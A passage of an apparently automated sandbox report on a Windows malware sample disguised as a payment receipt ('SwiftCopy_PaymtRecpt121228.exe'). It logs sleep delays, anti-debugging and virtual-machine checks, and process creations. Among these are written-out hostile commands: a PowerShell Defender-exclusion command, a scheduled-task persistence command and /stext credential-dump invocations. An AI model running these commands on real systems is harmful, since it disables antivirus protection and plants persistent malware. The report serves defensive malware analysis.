                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: B610000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: C610000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Memory allocated: D610000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: 2A10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: 2D00000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: 2A10000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: 91A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: A1A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: A3B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: B3B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: BAD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: CAD0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Memory allocated: DAD0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Code function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198D2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 240000
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 239828
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 239718
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 239609
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 239499
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 239390
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 239281
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 239172
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 239062
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 238953
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 238830
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 238712
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 238556
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 238422
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 238285
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 237937
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 237669
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 237562
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 237453
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 237342
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 237234
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 237119
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 237010
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Thread delayed: delay time: 240000
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe Thread delayed: delay time: 239874
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239656Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239544Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239437Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239326Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239212Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 239094Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238937Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238718Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 238484Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeWindow / User API: threadDelayed 775Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeWindow / User API: threadDelayed 2467Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6682Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3045Jump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeWindow / User API: threadDelayed 9754Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeWindow / User API: threadDelayed 1161Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeWindow / User API: threadDelayed 1390Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeAPI coverage: 5.3 %
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeAPI coverage: 9.6 %
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -239062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238830s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238712s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238556s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -238285s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237669s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237342s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237119s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7320Thread sleep time: -237010s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7700Thread sleep time: -723000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe TID: 7700Thread sleep time: -29262000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239874s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239765s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239656s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239544s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239437s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239326s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239212s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -239094s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238937s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238828s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238718s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238609s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7868Thread sleep time: -238484s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe TID: 7852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 7_2_100010F1
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_10006580 FindFirstFileExA, 7_2_10006580
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 12_2_0040B335
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0041B43F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 12_2_0041B43F
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 12_2_0040B53A
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0044D5F9 FindFirstFileExA, 12_2_0044D5F9
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 12_2_004089A9
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00406AC2 FindFirstFileW,FindNextFileW, 12_2_00406AC2
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 12_2_00407A8C
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00418C79 FindFirstFileW,FindNextFileW,FindNextFileW, 12_2_00418C79
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 12_2_00408DA7
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0040AE51 FindFirstFileW,FindNextFileW, 15_2_0040AE51
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 17_2_00407EF8
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 18_2_00407898
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 12_2_00406F06
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00418981 memset,GetSystemInfo, 15_2_00418981
Source: eaJOpx.exe, 00000009.00000002.2121395644.000000000749C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000125A000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: eaJOpx.exe, 00000009.00000002.2121395644.000000000749C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_100060E2
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0041BCF3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041BCF3
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h] 7_2_10004AB4
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00442564 mov eax, dword ptr fs:[00000030h] 12_2_00442564
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_1000724E GetProcessHeap, 7_2_1000724E
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10002639
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10002B1C
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00434178
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_0043A66D
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00433B54
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00433CE7 SetUnhandledExceptionFilter, 12_2_00433CE7
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eaJOpx.exe"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Memory written: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Memory written: C:\Users\user\AppData\Roaming\eaJOpx.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Section loaded: NULL target: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Section loaded: NULL target: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe protection: execute and read and write
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Section loaded: NULL target: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_00410F36
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00418764 mouse_event, 12_2_00418764
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpDCEE.tmp"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe "C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\nxiitqhhpsbyad"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\xrnatjradatdcsnha"
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Process created: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe /stext "C:\Users\user\AppData\Local\Temp\atstubkcrjlqnyjljdoav"
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eaJOpx" /XML "C:\Users\user\AppData\Local\Temp\tmpD79C.tmp"
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Process created: C:\Users\user\AppData\Roaming\eaJOpx.exe "C:\Users\user\AppData\Roaming\eaJOpx.exe"
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SProgram Manager
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bProgram Manager
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 8Program Manager
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: EProgram ManagerB
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: GProgram Managere
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: EProgram Manager
Source: SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000123E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 7_2_10002933 cpuid 7_2_10002933
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: GetLocaleInfoW, 12_2_004510CA
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: EnumSystemLocalesW, 12_2_004470BE
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_004511F3
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: GetLocaleInfoW, 12_2_004512FA
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 12_2_004513C7
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: GetLocaleInfoW, 12_2_004475A7
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: GetLocaleInfoA, 12_2_0040E679
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 12_2_00450A8F
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: EnumSystemLocalesW, 12_2_00450D52
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: EnumSystemLocalesW, 12_2_00450D07
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: EnumSystemLocalesW, 12_2_00450DED
Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 12_2_00450E7A
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Queries volume information: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe VolumeInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
